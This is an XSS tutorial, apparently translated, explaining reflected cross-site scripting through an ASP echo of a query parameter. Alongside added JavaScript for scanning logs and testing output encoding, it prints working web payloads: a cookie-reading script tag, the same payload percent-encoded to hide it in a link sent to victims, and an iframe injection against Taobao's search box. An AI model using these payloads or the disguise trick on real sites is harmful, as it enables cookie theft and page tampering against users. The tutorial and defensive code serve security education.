Anyone who has written ASP will have seen code like this:
Hello,
<%
Response.Write(Request.QueryString("name"))
%>
If the value passed in for name is:
<script>x=document.cookie;alert(x);</script>
then the script reads the user's cookie directly. So all it takes is to send someone a link like this and have them click it:
http://www.xxx.com/reg.asp?name=<script>x=document.cookie;alert(x);</script>
Of course this has no concealment at all: the xxx.com at the front may fool a few people, but most will recognize the JavaScript code that follows. So the JavaScript is simply converted into URL hexadecimal (percent) encoding, for example:
http://www.xxx.com/reg.asp?name=%3C%73%63%72%69%70%74%3E%78%3D%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%3B%61%6c%65%72%74%28%78%29%3b%3c%2f%73%63%72%69%70%74%3e
Can you still recognize the URL above? Not unless you decode it. (The conversion can be done with the Napkin tool, which, alas, is rather poor.)
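The disguise only works against a human eye; a log review that percent-decodes query strings sees the script again. The following is an added example, not code from the original article: it decodes the parameters of logged request lines and flags values that contain HTML markup or a javascript: URL. The only real input is the encoded URL quoted above; the other log lines, and the function names, are constructed for this example.

```javascript
// Added example (not code from the original article): percent-decode the
// query string of logged requests so that a disguised parameter value reads
// as plain text again, then flag values that contain HTML markup or a
// javascript: URL. Only the query quoted in the article is real input; the
// other log lines are constructed for this example.

const ARTICLE_URL_QUERY =
  "name=%3C%73%63%72%69%70%74%3E%78%3D%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%3B" +
  "%61%6c%65%72%74%28%78%29%3b%3c%2f%73%63%72%69%70%74%3e";

// Constructed sample request lines (METHOD PATH VERSION) as found in an access log.
const SAMPLE_LOG = [
  "GET /reg.asp?name=alice HTTP/1.1",
  "GET /reg.asp?" + ARTICLE_URL_QUERY + " HTTP/1.1",
  "GET /search.asp?q=a%20%26%20b&page=2 HTTP/1.1", // '&' and spaces, but no markup
  "GET /reg.asp?name=%E0%A4%A HTTP/1.1",            // truncated escape: must not crash the scan
];

// decodeURIComponent throws URIError on a malformed escape; keep the raw
// text in that case so a broken request is still inspected rather than skipped.
function safeDecode(s) {
  try {
    return decodeURIComponent(s.replace(/\+/g, " "));
  } catch (e) {
    return s;
  }
}

// Split a query string into a { key: decodedValue } object.
function decodeParams(query) {
  const out = {};
  for (const pair of query.split("&")) {
    if (pair === "") continue;
    const eq = pair.indexOf("=");
    const key = eq === -1 ? pair : pair.slice(0, eq);
    const val = eq === -1 ? "" : pair.slice(eq + 1);
    out[safeDecode(key)] = safeDecode(val);
  }
  return out;
}

// A decoded value that opens a tag or a javascript: URL is exactly what the
// article's page would echo back as code; flag it for review.
const MARKUP_RE = /<\s*\/?\s*[a-z!]|javascript\s*:/i;

// Returns one record per flagged parameter: the log line, the parameter
// name and its decoded value.
function flagRequests(lines) {
  const hits = [];
  for (const line of lines) {
    const m = /^\S+\s+(\S+)/.exec(line); // METHOD then PATH
    if (!m) continue;
    const path = m[1];
    const q = path.indexOf("?");
    if (q === -1) continue;
    const params = decodeParams(path.slice(q + 1));
    for (const [param, decoded] of Object.entries(params)) {
      if (MARKUP_RE.test(decoded)) hits.push({ line, param, decoded });
    }
  }
  return hits;
}

for (const h of flagRequests(SAMPLE_LOG)) {
  console.log(`flagged ${h.param}=${h.decoded}`);
}
```

Only the second line is flagged: its name parameter decodes back to the plain `<script>` payload, while the encoded `&` and spaces in the search query and the truncated escape in the last line are left alone. Decoding before matching is the point; a rule that looks for the literal string `<script` in raw logs never sees the percent-encoded form.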
Root cause
1. Input is not constrained, and output is not encoded
2. "Data" and "code" are not strictly separated
Example
Even the well-known Taobao turned out to have this vulnerability. Entering the following in the search box:
"/><div style="position:absolute;left:0px;top:0px;"><iframe src="http://www.baidu.com" frameborder=0 width=1000 height=900/></div><a href="
alters the original Taobao page, embedding Baidu's homepage inside it. The result is shown in the figure:
Where it occurs
I tried looking for XSS vulnerabilities on various websites, Baidu, amazon.cn, youku.com, dangdang.com and so on, and found that XSS vulnerabilities are very common. In essence XSS exploits the echo of a web page: the page receives input from the user and then displays that input back on the page. A few places where the vulnerability can occur:
1. Search engines
2. Message boards
3. Error pages
4. Enter some special characters (including < > / ") through the above kinds of pages, for example </?jjkk>, then search the source of the results page for the original string </?jjkk>. If it is there, congratulations, you have found an XSS vulnerability.
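The probe in step 4 is also the regression test a developer wants once the fix from the "Root cause" section is in place: if output is encoded, the probe never comes back verbatim. The following is an added example, not code from the original article. renderUnsafe models the reg.asp page above, which writes Request.QueryString("name") straight into the HTML; renderSafe is the same page with the output HTML-encoded; auditPage sends the harmless </?jjkk> probe through either one and reports whether it survives unencoded. The page template and all function names are this example's own.

```javascript
// Added example (not code from the original article). renderUnsafe models the
// article's reg.asp page, which writes Request.QueryString("name") straight into
// the HTML; renderSafe is the same page with the output HTML-encoded. auditPage
// is step 4 of the article turned into a unit test: send the harmless probe
// string </?jjkk> and check whether the response source still contains it
// verbatim. The page template and the function names are this example's own.

// Encode the five characters that change meaning in HTML text and in quoted
// attribute values. This is the "encoding of output" the article names as
// the missing control.
function htmlEncode(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Vulnerable: user data is concatenated into the page as code.
function renderUnsafe(name) {
  return "<html><body>Hello, " + name + "</body></html>";
}

// Fixed: the same page, with the data encoded for the HTML text context.
function renderSafe(name) {
  return "<html><body>Hello, " + htmlEncode(name) + "</body></html>";
}

// The probe from the article: harmless, but it contains the characters
// (< > / ?) that must not survive unencoded into the page source.
const PROBE = "</?jjkk>";

// True when the response source still contains the probe exactly as sent,
// meaning the page echoes input without encoding it.
function reflectsRaw(responseHtml, probe = PROBE) {
  return responseHtml.includes(probe);
}

// Run the probe through a render function and report whether it leaked.
function auditPage(render) {
  return reflectsRaw(render(PROBE));
}

console.log("unsafe page reflects probe:", auditPage(renderUnsafe)); // true
console.log("safe page reflects probe:", auditPage(renderSafe));     // false
```

Because htmlEncode also encodes the double quote, the same function covers the quoted-attribute context the Taobao example breaks out of with a leading `"/>`. It is not sufficient for a value placed inside a URL, a script block or an event handler; each of those contexts needs its own encoder, which is the practical meaning of "keep data and code strictly separated".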